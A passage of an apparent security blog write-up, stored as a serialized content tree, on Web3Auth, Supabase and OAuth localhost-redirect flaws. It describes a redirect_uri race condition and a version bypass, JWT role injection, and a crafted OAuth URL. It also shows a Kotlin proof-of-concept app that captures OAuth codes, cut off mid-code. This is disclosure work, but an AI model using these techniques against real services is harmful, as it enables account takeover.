",{"type":28,"tag":87,"props":69243,"children":69246},{"href":69244,"rel":69245},"https://web3auth.io/docs/dashboard-setup/whitelisting",[91],[69247],{"type":33,"value":69248},"whitelist",{"type":33,"value":69250}," to ensure it matches one of the allowed URLs.",{"type":28,"tag":75,"props":69252,"children":69254},{"id":69253},"in-transit-cryptography",[69255],{"type":33,"value":69256},"In-transit Cryptography",{"type":28,"tag":29,"props":69258,"children":69259},{},[69260,69262,69269,69271,69277,69279,69285,69287,69292,69294,69299],{"type":33,"value":69261},"The session server employs cryptography to securely send and receive authentication parameters. The ",{"type":28,"tag":87,"props":69263,"children":69266},{"href":69264,"rel":69265},"https://en.wikipedia.org/wiki/Key_(cryptography)",[91],[69267],{"type":33,"value":69268},"cryptographic key",{"type":33,"value":69270}," is derived from the ",{"type":28,"tag":98,"props":69272,"children":69274},{"className":69273},[],[69275],{"type":33,"value":69276},"sessionId",{"type":33,"value":69278},"  sent in the ",{"type":28,"tag":98,"props":69280,"children":69282},{"className":69281},[],[69283],{"type":33,"value":69284},"GET",{"type":33,"value":69286}," parameter to the ",{"type":28,"tag":98,"props":69288,"children":69290},{"className":69289},[],[69291],{"type":33,"value":69231},{"type":33,"value":69293},". Since the ",{"type":28,"tag":98,"props":69295,"children":69297},{"className":69296},[],[69298],{"type":33,"value":69276},{"type":33,"value":69300}," can be controlled, it allows us to send and receive data from the session server.",{"type":28,"tag":29,"props":69302,"children":69303},{},[69304],{"type":28,"tag":206,"props":69305,"children":69307},{"alt":50198,"src":69306},"/posts/web2-in-web3/image-2.png",[],{"type":28,"tag":75,"props":69309,"children":69311},{"id":69310},"race-condition",[69312],{"type":33,"value":69313},"Race Condition",{"type":28,"tag":29,"props":69315,"children":69316},{},[69317,69319,69324,69326,69332,69334,69339,69341,69346],{"type":33,"value":69318},"As shown in the diagram, the configuration data from the session server is validated only during the ",{"type":28,"tag":98,"props":69320,"children":69322},{"className":69321},[],[69323],{"type":33,"value":69231},{"type":33,"value":69325}," and later used in the ",{"type":28,"tag":98,"props":69327,"children":69329},{"className":69328},[],[69330],{"type":33,"value":69331},"/end",{"type":33,"value":69333}," enpoint. This introduces a potential race condition that can be exploited if an attacker manages to modify the parameters after  validation (",{"type":28,"tag":98,"props":69335,"children":69337},{"className":69336},[],[69338],{"type":33,"value":69231},{"type":33,"value":69340},") but before  use (",{"type":28,"tag":98,"props":69342,"children":69344},{"className":69343},[],[69345],{"type":33,"value":69331},{"type":33,"value":1484},{"type":28,"tag":29,"props":69348,"children":69349},{},[69350,69352,69359,69361,69366],{"type":33,"value":69351},"To exploit this ",{"type":28,"tag":87,"props":69353,"children":69356},{"href":69354,"rel":69355},"https://portswigger.net/web-security/race-conditions",[91],[69357],{"type":33,"value":69358},"race condition",{"type":33,"value":69360},",  an attacker-controlled website can initiate the authentication flow normally. Then, it can send another request to the session server with the same ",{"type":28,"tag":98,"props":69362,"children":69364},{"className":69363},[],[69365],{"type":33,"value":69276},{"type":33,"value":69367}," but with modified malicious parameters.",{"type":28,"tag":29,"props":69369,"children":69370},{},[69371],{"type":28,"tag":4995,"props":69372,"children":69373},{},[69374],{"type":33,"value":69375},"What can be modified to achieve something impactful?",{"type":28,"tag":29,"props":69377,"children":69378},{},[69379,69381,69387,69389,69394],{"type":33,"value":69380},"The answer is quite simple if you understand how OAuth works. The attacker can simply change the ",{"type":28,"tag":98,"props":69382,"children":69384},{"className":69383},[],[69385],{"type":33,"value":69386},"redirect_uri",{"type":33,"value":69388}," parameter to point to their own website and leak the secret token from the query string. With the secret token, they can authenticate against the application defined by ",{"type":28,"tag":98,"props":69390,"children":69392},{"className":69391},[],[69393],{"type":33,"value":69218},{"type":33,"value":141},{"type":28,"tag":29,"props":69396,"children":69397},{},[69398],{"type":28,"tag":206,"props":69399,"children":69401},{"alt":50198,"src":69400},"/posts/web2-in-web3/image-3.png",[],{"type":28,"tag":29,"props":69403,"children":69404},{},[69405],{"type":33,"value":69406},"Using this exploit, we were able to create a website capable of taking over the accounts of victims who followed the standard OAuth flow.",{"type":28,"tag":75,"props":69408,"children":69410},{"id":69409},"patch-bypass",[69411],{"type":33,"value":69412},"Patch & Bypass",{"type":28,"tag":29,"props":69414,"children":69415},{},[69416],{"type":33,"value":69417},"The vulnerability was reported and remediated on the same day (super quickly!). However, we found that the fix was not backported to older versions.",{"type":28,"tag":29,"props":69419,"children":69420},{},[69421],{"type":33,"value":69422},"To bypass the fix we were able to change the version in the URL:",{"type":28,"tag":2108,"props":69424,"children":69425},{},[69426,69437],{"type":28,"tag":459,"props":69427,"children":69428},{},[69429,69435],{"type":28,"tag":98,"props":69430,"children":69432},{"className":69431},[],[69433],{"type":33,"value":69434},"https://auth.web3auth.io/v8/start",{"type":33,"value":69436}," (latest version)",{"type":28,"tag":459,"props":69438,"children":69439},{},[69440,69446],{"type":28,"tag":98,"props":69441,"children":69443},{"className":69442},[],[69444],{"type":33,"value":69445},"https://auth.web3auth.io/v6/start",{"type":33,"value":69447}," (bypass)",{"type":28,"tag":29,"props":69449,"children":69450},{},[69451],{"type":33,"value":69452},"We reported this issue, and it was addressed just as quickly!",{"type":28,"tag":63,"props":69454,"children":69456},{"id":69455},"supabase-metadata-manipulation",[69457],{"type":33,"value":69458},"Supabase metadata manipulation",{"type":28,"tag":75,"props":69460,"children":69462},{"id":69461},"supabase-authentication-flow",[69463],{"type":33,"value":69464},"Supabase Authentication flow",{"type":28,"tag":29,"props":69466,"children":69467},{},[69468,69475,69477,69484],{"type":28,"tag":87,"props":69469,"children":69472},{"href":69470,"rel":69471},"https://supabase.com/docs/guides/auth",[91],[69473],{"type":33,"value":69474},"Supabase",{"type":33,"value":69476}," is a Backend-as-a-Service (BaaS) platform that provides authentication, database, and real-time APIs. The authentication process begins when a user registers or logs in. Supabase generates a ",{"type":28,"tag":87,"props":69478,"children":69481},{"href":69479,"rel":69480},"https://jwt.io/",[91],[69482],{"type":33,"value":69483},"JWT",{"type":33,"value":69485}," for the authenticated user, embedding claims such as the user ID, roles, and additional metadata (either user-provided or system-generated). This token is then returned to the client and used for subsequent API requests, during which the server validates the JWT to confirm the user’s identity and permissions.",{"type":28,"tag":75,"props":69487,"children":69489},{"id":69488},"jwt-verification",[69490],{"type":33,"value":69491},"JWT verification",{"type":28,"tag":29,"props":69493,"children":69494},{},[69495,69497,69502,69503,69509,69511,69517],{"type":33,"value":69496},"In one of our clients' systems, we discovered a vulnerability that allowed the inclusion of custom fields, such as ",{"type":28,"tag":98,"props":69498,"children":69500},{"className":69499},[],[69501],{"type":33,"value":69144},{"type":33,"value":10659},{"type":28,"tag":98,"props":69504,"children":69506},{"className":69505},[],[69507],{"type":33,"value":69508},"identity_data",{"type":33,"value":69510},", in a signup request by manipulating the input inside the ",{"type":28,"tag":98,"props":69512,"children":69514},{"className":69513},[],[69515],{"type":33,"value":69516},"\"data\": {}",{"type":33,"value":69518}," structure. These fields were then directly reflected in the issued JWT without validation.",{"type":28,"tag":29,"props":69520,"children":69521},{},[69522,69524,69530,69531,69537,69539,69545],{"type":33,"value":69523},"For example, an attacker could send a signup request with arbitrary data, such as ",{"type":28,"tag":98,"props":69525,"children":69527},{"className":69526},[],[69528],{"type":33,"value":69529},"\"role\": \"admin\"",{"type":33,"value":12800},{"type":28,"tag":98,"props":69532,"children":69534},{"className":69533},[],[69535],{"type":33,"value":69536},"\"email_verified\": true",{"type":33,"value":69538},", which would subsequently be included in the JWT claims. Additionally, it was possible to insert arbitrary fields beyond typical inputs, such as ",{"type":28,"tag":98,"props":69540,"children":69542},{"className":69541},[],[69543],{"type":33,"value":69544},"\"test\": \"test\"",{"type":33,"value":69546},", enabling us to inject arbitrary data into the final JWT token.",{"type":28,"tag":29,"props":69548,"children":69549},{},[69550],{"type":28,"tag":206,"props":69551,"children":69553},{"alt":50198,"src":69552},"/posts/web2-in-web3/image-4.png",[],{"type":28,"tag":29,"props":69555,"children":69556},{},[69557],{"type":33,"value":69558},"In this example we are controlling the \"role\" field within the user metadata. If the application manage roles using the metadata, it would be vulnerable to a privilege escalation since anyone could inject any role there.",{"type":28,"tag":29,"props":69560,"children":69561},{},[69562],{"type":33,"value":69563},"The attacker could subsequently log in on the main platform, retrieve the token, and verify that their injected parameters persist in the JWT by submitting it to a verification endpoint. This happens because a function parseSupaBase was parsing and verifying everything generated by the JWT supabase token.",{"type":28,"tag":234,"props":69565,"children":69567},{"className":31015,"code":69566,"language":31017,"meta":7,"style":7},"function parseSupaBase(token) {\n    try {\n        const [header, payload, signature] = token.split('.');\n        const decodedHeader = JSON.parse(atob(header));\n        const decodedPayload = JSON.parse(atob(payload));\n        return { header: decodedHeader, payload: decodedPayload, signature };\n    } catch (error) {\n        console.error('Error parsing token:', error);\n        return null;\n    }\n}\n",[69568],{"type":28,"tag":98,"props":69569,"children":69570},{"__ignoreMap":7},[69571,69596,69608,69677,69726,69774,69819,69842,69879,69894,69901],{"type":28,"tag":116,"props":69572,"children":69573},{"class":245,"line":246},[69574,69578,69583,69587,69592],{"type":28,"tag":116,"props":69575,"children":69576},{"style":376},[69577],{"type":33,"value":830},{"type":28,"tag":116,"props":69579,"children":69580},{"style":282},[69581],{"type":33,"value":69582}," parseSupaBase",{"type":28,"tag":116,"props":69584,"children":69585},{"style":266},[69586],{"type":33,"value":313},{"type":28,"tag":116,"props":69588,"children":69589},{"style":272},[69590],{"type":33,"value":69591},"token",{"type":28,"tag":116,"props":69593,"children":69594},{"style":266},[69595],{"type":33,"value":844},{"type":28,"tag":116,"props":69597,"children":69598},{"class":245,"line":256},[69599,69604],{"type":28,"tag":116,"props":69600,"children":69601},{"style":260},[69602],{"type":33,"value":69603},"    try",{"type":28,"tag":116,"props":69605,"children":69606},{"style":266},[69607],{"type":33,"value":1291},{"type":28,"tag":116,"props":69609,"children":69610},{"class":245,"line":293},[69611,69615,69619,69624,69628,69633,69637,69642,69646,69650,69655,69659,69664,69668,69673],{"type":28,"tag":116,"props":69612,"children":69613},{"style":376},[69614],{"type":33,"value":32538},{"type":28,"tag":116,"props":69616,"children":69617},{"style":266},[69618],{"type":33,"value":22695},{"type":28,"tag":116,"props":69620,"children":69621},{"style":272},[69622],{"type":33,"value":69623},"header",{"type":28,"tag":116,"props":69625,"children":69626},{"style":266},[69627],{"type":33,"value":825},{"type":28,"tag":116,"props":69629,"children":69630},{"style":272},[69631],{"type":33,"value":69632},"payload",{"type":28,"tag":116,"props":69634,"children":69635},{"style":266},[69636],{"type":33,"value":825},{"type":28,"tag":116,"props":69638,"children":69639},{"style":272},[69640],{"type":33,"value":69641},"signature",{"type":28,"tag":116,"props":69643,"children":69644},{"style":266},[69645],{"type":33,"value":8333},{"type":28,"tag":116,"props":69647,"children":69648},{"style":370},[69649],{"type":33,"value":373},{"type":28,"tag":116,"props":69651,"children":69652},{"style":272},[69653],{"type":33,"value":69654}," token",{"type":28,"tag":116,"props":69656,"children":69657},{"style":266},[69658],{"type":33,"value":141},{"type":28,"tag":116,"props":69660,"children":69661},{"style":282},[69662],{"type":33,"value":69663},"split",{"type":28,"tag":116,"props":69665,"children":69666},{"style":266},[69667],{"type":33,"value":313},{"type":28,"tag":116,"props":69669,"children":69670},{"style":563},[69671],{"type":33,"value":69672},"'.'",{"type":28,"tag":116,"props":69674,"children":69675},{"style":266},[69676],{"type":33,"value":895},{"type":28,"tag":116,"props":69678,"children":69679},{"class":245,"line":361},[69680,69684,69689,69693,69697,69701,69705,69709,69714,69718,69722],{"type":28,"tag":116,"props":69681,"children":69682},{"style":376},[69683],{"type":33,"value":32538},{"type":28,"tag":116,"props":69685,"children":69686},{"style":272},[69687],{"type":33,"value":69688}," decodedHeader",{"type":28,"tag":116,"props":69690,"children":69691},{"style":370},[69692],{"type":33,"value":2226},{"type":28,"tag":116,"props":69694,"children":69695},{"style":272},[69696],{"type":33,"value":37151},{"type":28,"tag":116,"props":69698,"children":69699},{"style":266},[69700],{"type":33,"value":141},{"type":28,"tag":116,"props":69702,"children":69703},{"style":282},[69704],{"type":33,"value":38833},{"type":28,"tag":116,"props":69706,"children":69707},{"style":266},[69708],{"type":33,"value":313},{"type":28,"tag":116,"props":69710,"children":69711},{"style":282},[69712],{"type":33,"value":69713},"atob",{"type":28,"tag":116,"props":69715,"children":69716},{"style":266},[69717],{"type":33,"value":313},{"type":28,"tag":116,"props":69719,"children":69720},{"style":272},[69721],{"type":33,"value":69623},{"type":28,"tag":116,"props":69723,"children":69724},{"style":266},[69725],{"type":33,"value":1929},{"type":28,"tag":116,"props":69727,"children":69728},{"class":245,"line":387},[69729,69733,69738,69742,69746,69750,69754,69758,69762,69766,69770],{"type":28,"tag":116,"props":69730,"children":69731},{"style":376},[69732],{"type":33,"value":32538},{"type":28,"tag":116,"props":69734,"children":69735},{"style":272},[69736],{"type":33,"value":69737}," decodedPayload",{"type":28,"tag":116,"props":69739,"children":69740},{"style":370},[69741],{"type":33,"value":2226},{"type":28,"tag":116,"props":69743,"children":69744},{"style":272},[69745],{"type":33,"value":37151},{"type":28,"tag":116,"props":69747,"children":69748},{"style":266},[69749],{"type":33,"value":141},{"type":28,"tag":116,"props":69751,"children":69752},{"style":282},[69753],{"type":33,"value":38833},{"type":28,"tag":116,"props":69755,"children":69756},{"style":266},[69757],{"type":33,"value":313},{"type":28,"tag":116,"props":69759,"children":69760},{"style":282},[69761],{"type":33,"value":69713},{"type":28,"tag":116,"props":69763,"children":69764},{"style":266},[69765],{"type":33,"value":313},{"type":28,"tag":116,"props":69767,"children":69768},{"style":272},[69769],{"type":33,"value":69632},{"type":28,"tag":116,"props":69771,"children":69772},{"style":266},[69773],{"type":33,"value":1929},{"type":28,"tag":116,"props":69775,"children":69776},{"class":245,"line":400},[69777,69781,69785,69790,69794,69798,69803,69807,69811,69815],{"type":28,"tag":116,"props":69778,"children":69779},{"style":260},[69780],{"type":33,"value":15405},{"type":28,"tag":116,"props":69782,"children":69783},{"style":266},[69784],{"type":33,"value":9254},{"type":28,"tag":116,"props":69786,"children":69787},{"style":272},[69788],{"type":33,"value":69789},"header:",{"type":28,"tag":116,"props":69791,"children":69792},{"style":272},[69793],{"type":33,"value":69688},{"type":28,"tag":116,"props":69795,"children":69796},{"style":266},[69797],{"type":33,"value":825},{"type":28,"tag":116,"props":69799,"children":69800},{"style":272},[69801],{"type":33,"value":69802},"payload:",{"type":28,"tag":116,"props":69804,"children":69805},{"style":272},[69806],{"type":33,"value":69737},{"type":28,"tag":116,"props":69808,"children":69809},{"style":266},[69810],{"type":33,"value":825},{"type":28,"tag":116,"props":69812,"children":69813},{"style":272},[69814],{"type":33,"value":69641},{"type":28,"tag":116,"props":69816,"children":69817},{"style":266},[69818],{"type":33,"value":17962},{"type":28,"tag":116,"props":69820,"children":69821},{"class":245,"line":614},[69822,69826,69830,69834,69838],{"type":28,"tag":116,"props":69823,"children":69824},{"style":266},[69825],{"type":33,"value":15440},{"type":28,"tag":116,"props":69827,"children":69828},{"style":260},[69829],{"type":33,"value":48033},{"type":28,"tag":116,"props":69831,"children":69832},{"style":266},[69833],{"type":33,"value":269},{"type":28,"tag":116,"props":69835,"children":69836},{"style":272},[69837],{"type":33,"value":974},{"type":28,"tag":116,"props":69839,"children":69840},{"style":266},[69841],{"type":33,"value":844},{"type":28,"tag":116,"props":69843,"children":69844},{"class":245,"line":631},[69845,69850,69854,69858,69862,69867,69871,69875],{"type":28,"tag":116,"props":69846,"children":69847},{"style":272},[69848],{"type":33,"value":69849},"        console",{"type":28,"tag":116,"props":69851,"children":69852},{"style":266},[69853],{"type":33,"value":141},{"type":28,"tag":116,"props":69855,"children":69856},{"style":282},[69857],{"type":33,"value":974},{"type":28,"tag":116,"props":69859,"children":69860},{"style":266},[69861],{"type":33,"value":313},{"type":28,"tag":116,"props":69863,"children":69864},{"style":563},[69865],{"type":33,"value":69866},"'Error parsing token:'",{"type":28,"tag":116,"props":69868,"children":69869},{"style":266},[69870],{"type":33,"value":825},{"type":28,"tag":116,"props":69872,"children":69873},{"style":272},[69874],{"type":33,"value":974},{"type":28,"tag":116,"props":69876,"children":69877},{"style":266},[69878],{"type":33,"value":895},{"type":28,"tag":116,"props":69880,"children":69881},{"class":245,"line":665},[69882,69886,69890],{"type":28,"tag":116,"props":69883,"children":69884},{"style":260},[69885],{"type":33,"value":15405},{"type":28,"tag":116,"props":69887,"children":69888},{"style":376},[69889],{"type":33,"value":379},{"type":28,"tag":116,"props":69891,"children":69892},{"style":266},[69893],{"type":33,"value":384},{"type":28,"tag":116,"props":69895,"children":69896},{"class":245,"line":713},[69897],{"type":28,"tag":116,"props":69898,"children":69899},{"style":266},[69900],{"type":33,"value":3025},{"type":28,"tag":116,"props":69902,"children":69903},{"class":245,"line":750},[69904],{"type":28,"tag":116,"props":69905,"children":69906},{"style":266},[69907],{"type":33,"value":406},{"type":28,"tag":75,"props":69909,"children":69910},{"id":39953},[69911],{"type":33,"value":39956},{"type":28,"tag":29,"props":69913,"children":69914},{},[69915,69917,69924,69926,69932],{"type":33,"value":69916},"Developers should avoid trusting input from their Supabase custom domain. ",{"type":28,"tag":87,"props":69918,"children":69921},{"href":69919,"rel":69920},"https://supabase.com/docs/guides/database/postgres/row-level-security",[91],[69922],{"type":33,"value":69923},"Row-Level Security",{"type":33,"value":69925}," (RLS) on Supabase should be enforced, plus important and private fields should be defined in ",{"type":28,"tag":98,"props":69927,"children":69929},{"className":69928},[],[69930],{"type":33,"value":69931},"app_metadata",{"type":33,"value":69933},". These fields must be strictly validated at every step of their creation and update processes.",{"type":28,"tag":63,"props":69935,"children":69937},{"id":69936},"oauth-in-development-environments",[69938],{"type":33,"value":69939},"OAuth in development environments",{"type":28,"tag":29,"props":69941,"children":69942},{},[69943,69945,69952,69954,69959],{"type":33,"value":69944},"After watching a ",{"type":28,"tag":87,"props":69946,"children":69949},{"href":69947,"rel":69948},"https://docs.google.com/presentation/d/1571_ZSOtfVat9u63zfn1ugTPZRN7pQsFIblcxci3czM/edit",[91],[69950],{"type":33,"value":69951},"talk",{"type":33,"value":69953}," by Luan Herrera on exploiting the logic of desktop apps that use OAuth for authentication (specifically using a localhost server), we noticed that many of our customers also permitted localhost within the ",{"type":28,"tag":98,"props":69955,"children":69957},{"className":69956},[],[69958],{"type":33,"value":69386},{"type":33,"value":69960}," parameter during the OAuth flow.",{"type":28,"tag":29,"props":69962,"children":69963},{},[69964,69966,69973],{"type":33,"value":69965},"Herrera's research highlights that if localhost is allowed as a redirect URI, it is generally not exploitable in a desktop environment because impersonating localhost without ",{"type":28,"tag":87,"props":69967,"children":69970},{"href":69968,"rel":69969},"https://www.cloudflare.com/learning/security/what-is-remote-code-execution/",[91],[69971],{"type":33,"value":69972},"Remote Code Execution",{"type":33,"value":69974}," (RCE) is impossible. However, the scenario changes in a mobile environment, where it is feasible to open a localhost web server using a malicious app, making exploitation possible.",{"type":28,"tag":29,"props":69976,"children":69977},{},[69978,69980,69986],{"type":33,"value":69979},"In one of our client's implementations, we identified that ",{"type":28,"tag":98,"props":69981,"children":69983},{"className":69982},[],[69984],{"type":33,"value":69985},"localhost:3000",{"type":33,"value":69987}," was permitted. The exploitation method is the same as demonstrated in Herrera's talk. However, we observed that localhost servers are frequently used and whitelisted by developers, not only for desktop applications but also for testing and development environments.",{"type":28,"tag":29,"props":69989,"children":69990},{},[69991],{"type":33,"value":69992},"For the exploitation, the final Google OAuth URL was constructed as follows:",{"type":28,"tag":234,"props":69994,"children":69997},{"className":69995,"code":69996,"language":948,"meta":7,"style":7},"language-url shiki shiki-themes slack-dark","https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\n",[69998],{"type":28,"tag":98,"props":69999,"children":70000},{"__ignoreMap":7},[70001],{"type":28,"tag":116,"props":70002,"children":70003},{"class":245,"line":246},[70004],{"type":28,"tag":116,"props":70005,"children":70006},{},[70007],{"type":33,"value":69996},{"type":28,"tag":29,"props":70009,"children":70010},{},[70011],{"type":33,"value":70012},"Since there was no public exploit, we also created a proof of concept demonstrating how a malicious APK can be created to steal the OAuth token simply by opening the malicious app. This occurs without any user interaction and results in account takeover.",{"type":28,"tag":234,"props":70014,"children":70018},{"className":70015,"code":70016,"language":70017,"meta":7,"style":7},"language-kotlin shiki shiki-themes slack-dark","class MainActivity : AppCompatActivity() {\n\n    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.search;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n}\n","kotlin",[70019],{"type":28,"tag":98,"props":70020,"children":70021},{"__ignoreMap":7},[70022,70049,70056,70088,70110,70117,70125,70147,70159,70171,70206,70232,70282,70289,70296,70303,70311,70333,70368,70381,70388,70395,70415,70441,70453,70474,70491,70503,70529,70568,70589,70597,70609,70634,70646,70659,70667,70674,70682,70690,70697,70727,70734],{"type":28,"tag":116,"props":70023,"children":70024},{"class":245,"line":246},[70025,70030,70035,70040,70045],{"type":28,"tag":116,"props":70026,"children":70027},{"style":376},[70028],{"type":33,"value":70029},"class",{"type":28,"tag":116,"props":70031,"children":70032},{"style":339},[70033],{"type":33,"value":70034}," MainActivity",{"type":28,"tag":116,"props":70036,"children":70037},{"style":266},[70038],{"type":33,"value":70039}," : ",{"type":28,"tag":116,"props":70041,"children":70042},{"style":339},[70043],{"type":33,"value":70044},"AppCompatActivity",{"type":28,"tag":116,"props":70046,"children":70047},{"style":266},[70048],{"type":33,"value":1068},{"type":28,"tag":116,"props":70050,"children":70051},{"class":245,"line":256},[70052],{"type":28,"tag":116,"props":70053,"children":70054},{"emptyLinePlaceholder":19},[70055],{"type":33,"value":1044},{"type":28,"tag":116,"props":70057,"children":70058},{"class":245,"line":293},[70059,70064,70068,70073,70078,70083],{"type":28,"tag":116,"props":70060,"children":70061},{"style":376},[70062],{"type":33,"value":70063},"    override",{"type":28,"tag":116,"props":70065,"children":70066},{"style":376},[70067],{"type":33,"value":5878},{"type":28,"tag":116,"props":70069,"children":70070},{"style":282},[70071],{"type":33,"value":70072}," onCreate",{"type":28,"tag":116,"props":70074,"children":70075},{"style":266},[70076],{"type":33,"value":70077},"(savedInstanceState: ",{"type":28,"tag":116,"props":70079,"children":70080},{"style":339},[70081],{"type":33,"value":70082},"Bundle",{"type":28,"tag":116,"props":70084,"children":70085},{"style":266},[70086],{"type":33,"value":70087},"?) {\n",{"type":28,"tag":116,"props":70089,"children":70090},{"class":245,"line":361},[70091,70096,70100,70105],{"type":28,"tag":116,"props":70092,"children":70093},{"style":376},[70094],{"type":33,"value":70095},"        super",{"type":28,"tag":116,"props":70097,"children":70098},{"style":266},[70099],{"type":33,"value":141},{"type":28,"tag":116,"props":70101,"children":70102},{"style":282},[70103],{"type":33,"value":70104},"onCreate",{"type":28,"tag":116,"props":70106,"children":70107},{"style":266},[70108],{"type":33,"value":70109},"(savedInstanceState)\n",{"type":28,"tag":116,"props":70111,"children":70112},{"class":245,"line":387},[70113],{"type":28,"tag":116,"props":70114,"children":70115},{"emptyLinePlaceholder":19},[70116],{"type":33,"value":1044},{"type":28,"tag":116,"props":70118,"children":70119},{"class":245,"line":400},[70120],{"type":28,"tag":116,"props":70121,"children":70122},{"style":250},[70123],{"type":33,"value":70124},"        // Start the Ktor web server\n",{"type":28,"tag":116,"props":70126,"children":70127},{"class":245,"line":614},[70128,70133,70138,70143],{"type":28,"tag":116,"props":70129,"children":70130},{"style":282},[70131],{"type":33,"value":70132},"        CoroutineScope",{"type":28,"tag":116,"props":70134,"children":70135},{"style":266},[70136],{"type":33,"value":70137},"(Dispatchers.IO).",{"type":28,"tag":116,"props":70139,"children":70140},{"style":282},[70141],{"type":33,"value":70142},"launch",{"type":28,"tag":116,"props":70144,"children":70145},{"style":266},[70146],{"type":33,"value":1291},{"type":28,"tag":116,"props":70148,"children":70149},{"class":245,"line":631},[70150,70155],{"type":28,"tag":116,"props":70151,"children":70152},{"style":260},[70153],{"type":33,"value":70154},"            try",{"type":28,"tag":116,"props":70156,"children":70157},{"style":266},[70158],{"type":33,"value":1291},{"type":28,"tag":116,"props":70160,"children":70161},{"class":245,"line":665},[70162,70167],{"type":28,"tag":116,"props":70163,"children":70164},{"style":282},[70165],{"type":33,"value":70166},"                startWebServer",{"type":28,"tag":116,"props":70168,"children":70169},{"style":266},[70170],{"type":33,"value":7407},{"type":28,"tag":116,"props":70172,"children":70173},{"class":245,"line":713},[70174,70179,70184,70188,70193,70197,70202],{"type":28,"tag":116,"props":70175,"children":70176},{"style":266},[70177],{"type":33,"value":70178},"                Log.",{"type":28,"tag":116,"props":70180,"children":70181},{"style":282},[70182],{"type":33,"value":70183},"d",{"type":28,"tag":116,"props":70185,"children":70186},{"style":266},[70187],{"type":33,"value":313},{"type":28,"tag":116,"props":70189,"children":70190},{"style":563},[70191],{"type":33,"value":70192},"\"WebServer\"",{"type":28,"tag":116,"props":70194,"children":70195},{"style":266},[70196],{"type":33,"value":825},{"type":28,"tag":116,"props":70198,"children":70199},{"style":563},[70200],{"type":33,"value":70201},"\"Server started on http://localhost:3000\"",{"type":28,"tag":116,"props":70203,"children":70204},{"style":266},[70205],{"type":33,"value":2830},{"type":28,"tag":116,"props":70207,"children":70208},{"class":245,"line":750},[70209,70214,70218,70223,70228],{"type":28,"tag":116,"props":70210,"children":70211},{"style":266},[70212],{"type":33,"value":70213},"            } ",{"type":28,"tag":116,"props":70215,"children":70216},{"style":376},[70217],{"type":33,"value":48033},{"type":28,"tag":116,"props":70219,"children":70220},{"style":266},[70221],{"type":33,"value":70222}," (e: ",{"type":28,"tag":116,"props":70224,"children":70225},{"style":339},[70226],{"type":33,"value":70227},"Exception",{"type":28,"tag":116,"props":70229,"children":70230},{"style":266},[70231],{"type":33,"value":844},{"type":28,"tag":116,"props":70233,"children":70234},{"class":245,"line":779},[70235,70239,70243,70247,70251,70255,70260,70264,70269,70273,70277],{"type":28,"tag":116,"props":70236,"children":70237},{"style":266},[70238],{"type":33,"value":70178},{"type":28,"tag":116,"props":70240,"children":70241},{"style":282},[70242],{"type":33,"value":1413},{"type":28,"tag":116,"props":70244,"children":70245},{"style":266},[70246],{"type":33,"value":313},{"type":28,"tag":116,"props":70248,"children":70249},{"style":563},[70250],{"type":33,"value":70192},{"type":28,"tag":116,"props":70252,"children":70253},{"style":266},[70254],{"type":33,"value":825},{"type":28,"tag":116,"props":70256,"children":70257},{"style":563},[70258],{"type":33,"value":70259},"\"Error starting server: ",{"type":28,"tag":116,"props":70261,"children":70262},{"style":376},[70263],{"type":33,"value":867},{"type":28,"tag":116,"props":70265,"children":70266},{"style":370},[70267],{"type":33,"value":70268},"e.message",{"type":28,"tag":116,"props":70270,"children":70271},{"style":376},[70272],{"type":33,"value":885},{"type":28,"tag":116,"props":70274,"children":70275},{"style":563},[70276],{"type":33,"value":2240},{"type":28,"tag":116,"props":70278,"children":70279},{"style":266},[70280],{"type":33,"value":70281},", e)\n",{"type":28,"tag":116,"props":70283,"children":70284},{"class":245,"line":796},[70285],{"type":28,"tag":116,"props":70286,"children":70287},{"style":266},[70288],{"type":33,"value":58503},{"type":28,"tag":116,"props":70290,"children":70291},{"class":245,"line":847},[70292],{"type":28,"tag":116,"props":70293,"children":70294},{"style":266},[70295],{"type":33,"value":1954},{"type":28,"tag":116,"props":70297,"children":70298},{"class":245,"line":898},[70299],{"type":28,"tag":116,"props":70300,"children":70301},{"emptyLinePlaceholder":19},[70302],{"type":33,"value":1044},{"type":28,"tag":116,"props":70304,"children":70305},{"class":245,"line":907},[70306],{"type":28,"tag":116,"props":70307,"children":70308},{"style":250},[70309],{"type":33,"value":70310},"        // Open the Google OAuth page\n",{"type":28,"tag":116,"props":70312,"children":70313},{"class":245,"line":981},[70314,70319,70324,70328],{"type":28,"tag":116,"props":70315,"children":70316},{"style":376},[70317],{"type":33,"value":70318},"        val",{"type":28,"tag":116,"props":70320,"children":70321},{"style":266},[70322],{"type":33,"value":70323}," googleOAuthUrl 